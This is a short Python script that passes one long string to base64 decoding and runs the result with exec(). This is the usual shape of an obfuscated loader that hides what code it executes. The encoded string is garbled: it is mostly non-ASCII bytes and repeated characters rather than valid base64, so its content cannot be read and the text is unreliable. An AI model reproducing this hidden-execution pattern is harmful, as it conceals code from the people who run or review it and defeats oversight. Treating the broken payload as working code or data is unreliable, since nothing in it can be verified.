import base64
exec(base64.b64decode("jh,jh2)nYboxj)jjhފjh(rGjhg)pjȦ(~&zljh)j"z+yƭz
+7*'Yxy({\Z+z'ejl"},^Dmzz۫ױշf[g(r^muy^޶rhױ}]yy-{kz۫%^]y+y{kz۫%^uۖ{kz۫%^uܢ{^znVv*m*ު笶&EznZ)zw-eۺ)]^zm_ܢ{^)zw-杭\רwު笵zfr\׶I^frjwkyuembf(קzy^GqmnqZǛjrZqh岖rgzi%prr止fZnr(yۖk+nY޵bs&ޮZ ޵n[('zkwnrkwnrn{ںv]岊۲wvkܧr]岊۲wfzۖk+nY޶*lm$ƭޮgfjxwjǫ'w+v{+n޶z))jjڶ(inY޵Z)nY޵ZnY޵n[)jhZ+bۖwzggz֮1ɹ`qۖ)zkvZk+zZ޶kzȝz{bjV-슙''v{wjggz֮kiv{+n޶gllnr)jggllnYgz)jk)jjڶ(Zj\݊nY޵glyh^zޮ+v{ǜ+u뛖V&n˛+y&*厛+nYgzmn[('z(jۖ)r[Z쥩j(虸v{+n޵ڮ֜z{kjZ+l޵ZrIb(ܜiyh(y֛ǜ&n)vۖwu)nX~g\ɷ"rwv{+n޵曺ǜ曺ǜۢlWgl]Zw)⦺-ܢhmglbۖwi,qmz"nY+ndǬf岊۲wmZ&lv{wj&ggz֮lv{wj,ggz֮v{wj[Z)୹fiޱnY޵rnX0y\j{^ǫzݶggz֮ZƫzVwz޲'^ؚhrKkj{"ykݞZnY޵]岊۲w$n[('z)jfǜZn[('z)jjۖk+nY޶ZZ&b!wb-v{wjhn[r(׭ݞ-z啫!m$rn[rrcۖk+nY޷v{+n޷
+j\岖3z{)jhZ+:&n'岊۲wm.uږn[)jg(wnVX
(w'!qZnj+&n)u!rwf]o
[)ߡnW2m]岊۲wv'y!v'y!v觽i(nn[('znxazw(mn[('zئjfbrKj^v{fۧz(zq'z٢glgklrZnY޵Z+nY޵Z岖)+!x+nYgzkv{wjkzb׫z޶mnY޵zV`qޕaz޶ק&nZڞȩZrwggz֮k-v{wj&gll,v{+n޶Z!v{+n޶ZۖwlrnXmثy]Z+v{ǜ+uhǫglyh^ej[ik칻k+nX*ۖwݞ岊۲w歹b!Źlj(ޞZΉgl[mi˝iǧZ)[$+-\nVǚrwiy\fknYgz[wv{̛zh''zgl]iy]iy])jZv+ۥv{+n޵ۥr*k^&iv{+n޶)+nYgzة׫z+,]噩޶J+yz޶hqn[('z쥩jj!ggz֮jv{wj,ggz֮v{wj0~ggz֮lj(
ab
ۖk+nY޶mZ&ƫnXzޮwlv{wjޕnX0y\jk+'z^w"u퉩[$*gnY޵]Zɭn[('z(rK岊۲wiyl岊۲wfljk)jjۖ)rwv*rggz֮ݞ-z+zhn[r(׮nYZrG({.n((ۖ:ofpyglpnXqn[)jhZ+73fyn[('zޟ$ܢ]	.raw).r'؟~&mӟ!r虷Nh&j\yhO(0_!'{hhﭢ!jKbh-z r虷N~[fޯ}9D9m쵫nnf^*+-bi:+*+-EM/赤DLbz+LD+Mׅj[g)Nj!zǦz"a歲whrJ?r~-جe^vęxȬ+-y'g)Nj瀖'Umzjبbz{ں[\ozjب֭j+'bםp%jmbםp%jmNZX1!0nZX׿+-ן"mXhhrIbĊbםpe%C:x:ڂzǚF$ikj
'j!.)m!q+'bםpj
'Ej!.+%^ví(y܄j躟Htj
'Ej!.M
mݭ(y܆
躚+(!rmq+'bםpj
'Ej!.M
+%^ví(y܄j躟4$hNƥކi0z-)䢸?nVXi%pjibz-+-y'6yj\謖+-y'6yj\hN$i0z-)䢸?nVXi%jYmجe^v͡8bD+%^v͡8bD:xWvm^鞮kylnZzܢjkhyߢq+'bםq^"XhWv槶+)jhaZ)r쥩bz-+-y'j{bj\+%^vڞج!NvbzWa0vbzWhƬr(iehM4+'bםwl'v+%^vݲ隕zmjW4u(VXmXhfsG^bםyy:xƥY+^mڦ/yhO!'{hhﭢ!jKbhh精(0_-nzh\&mә޷XhƥY+^+%^vjUrjgj)ڮ
Zǀz{Oj׬r*'"ij]g*azZH=],!y)j]gיּ^%bZc*tV朶*'+{k櫂Zǫ{ȟj,'yj,Mw^*tmb*^Ǧal*b*+ױmj-nzmjiڦ'-nzNh^*`zm?br虷}9-{bZal[fޮm"iڦ'-nzӚ+ױ*zmj&m}9-{bZal[fޮm"iڦ(ZrGz-nz+ױmji֫\&m^k{[炅$ j)춚)V t3RnVXk{[瀪蜑v*+[8bzk{ky(nnX v+4+fH=:$)znj.ܨXz$я~jٲ*b~Z0z2mblv*bn[hZ]ʋG^rHmb+
w2b=],!y<E:zwg`zvvv*`zab$zZr"mbױmڦ(ZrGz(*v*m{i)n[8^�~g~jv*kzv{))Fzhqbr"wf)n["�=8~[.qڊY)D}'׬mb'ڮ,+y+[iةWwM_ڊP@P@~ۖ)ۖkl(v{+z%z%򎈧ޮǝiةbl()}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}f޲ozb}b}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}j{0z&޲ozzf޲ozzMt)[iة+%^v)n_ѩt��?{g[ެ86+yiة+'bםcc^ǩ(N)i)nX`4FN)jx>nWqmv{+z%֦͠zǫ즸bED
'jgzޮ{g[ެ�yH4chj{0z妸H}ٹZrIb'~jv*A�18?�"))